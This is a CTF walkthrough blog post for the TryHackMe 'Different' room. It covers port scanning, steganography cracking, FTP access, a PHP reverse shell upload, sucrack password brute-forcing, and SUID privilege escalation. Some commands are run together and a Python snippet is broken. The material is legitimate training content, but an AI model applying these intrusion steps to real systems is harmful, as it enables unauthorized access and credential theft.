TryHackMe: Different CTF

Today we will take a look at TryHackMe: Different CTF. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • How many ports are open ?
└─$ sudo nmap -p- -Pn -sV -sC --open          
Starting Nmap 7.92 ( ) at 2022-05-28 18:28 +04
Nmap scan report for
Host is up (0.15s latency).
Not shown: 65060 closed tcp ports (reset), 473 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
|_http-title: Hello World – Just another WordPress site
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Unix

Answer: 2

  • What is the name of the secret directory ?

When we look at the page, we see that it is damaged.

When we look at the source code, we see the host name to be added to / etc / host

Command: sudo nano /etc/hosts   adana.thm


Command: gobuster dir -u http://adana.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/announcements (Status: 301) [Size: 314] [--> http://adana.thm/announcements/]

Answer: announcements

  • Web flag ?

When we look at http://adana.thm/announcements/, we see a list of picture and words. Let’s download them.


Command: stegcracker austrailian-bulldog-ant.jpg wordlist.txtPassword:123adana********Command: steghide — extract -sf austrailian-bulldog-ant.jpgCommand: cat user-pass-ftp.txt |base64 -d

USER: hakanftp
PASS: 123adana*****


Command: ftp IP

Let’s add a php reverse shell to the folder we see when we log in.

Command: put reverseshell.phpCommand: chmod 777 reverseshell.php

But I couldn’t get the shell when I wrote http: //adana.thm/reverseshell.php

To do this, I downloaded the wp-config file and looked at its contents.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'phpmyadmin1' );

/** MySQL database username */
define( 'DB_USER', 'phpmyadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', '12345' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );


Select wp_options in phpmyadmin1 when accessing the panel. Here we see another subdomain

Command: sudo nano /etc/hosts   adana.thm  subdomain.adana.thm

Now let’s take the shell

After logging in

Command: script /dev/null -c bashCommand: export TERM=xtermCtrl+z                             
Command: stty raw -echo ; fg
Command: reset
Command: cat /var/www/html/wwe3bbfla4g.txt
  • Hakanbey

We will find the password of this username with bruteforce. We must first prepare a list for this. The first two passwords we found have the inscription ‘123adana’ in front of them. Let’s write them in front of the words on the list we have. I wrote code that will do this with Python:

file = open('wordlist.txt', 'r')
file1 = open('new.txt', 'w')
for line in file:
b = '123adana' + line

After running the code, you need a tool to check them one by one. Therefore, we will use the sucrack tool.

Command: wget

In local machine:

Command: python3 -m http.server 80

In target machine:

Command: wget–6_amd64.deb

Command: dpkg -x sucrack_1.2.3–6_amd64.deb sucrack

Command: mkdir brute

Command: cd brute/

Command: cp /tmp/hakanbey/sucrack/usr/bin/sucrack .

Command: cp /tmp/hakanbey/new.txt .

Command: ./sucrack -w 100 -b 500 -u hakanbey new.txt

Password: 123adana*****

Command: cat /home/hakanbey/user.txt
  • Root

Command: find / -perm -u=s 2>/dev/null

There is an additional parameter here. Let’s start it now and see what operation is going on behind it.

hakanbey@ubuntu:/$ ltrace ./usr/bin/binary

Password: warzone*************

hakanbey@ubuntu:/$ /usr/bin/binary
I think you should enter the correct string here ==>warzoneinadana
Hint! : Hexeditor 00000020 ==> ???? ==> /home/hakanbey/Desktop/root.jpg (CyberChef)

Copy /root/root.jpg ==> /home/hakanbey/root.jpg

Let’s copy the root.jpg image to our local machine.

In target machine:

Command: python3 -m http.server 8000

In local machine

Command: wget

When looking at the given tip, you should look at the hex codes of the image, you need to decode the hex codes in the order 00000020

Command: su root

And now we are the root Babba ;)

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Loading Scenes in Unity

Tryhackme Different [Adana]CTF Writeup

The Most Important Skill For A Tester

Internet Of Things — Digital Twins

Transferring the Raspberry Pi OS to a Micro SD Card on the Mac Terminal

A Guide to DevOps

State pattern for changing internal processes

My drawing of State pattern

Let’s Create PHP Dependency Injection Container and Try to Learn How Laravel Initiate Controller…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Write-Up Linux PrivEsc — Capstone Challenge

TryHackMe: Smag Grotto

HackTheBox Unicode Write-Up

Unicode Avatar

Introduction to Web Hacking Part 1— TryHackMe Walkthrough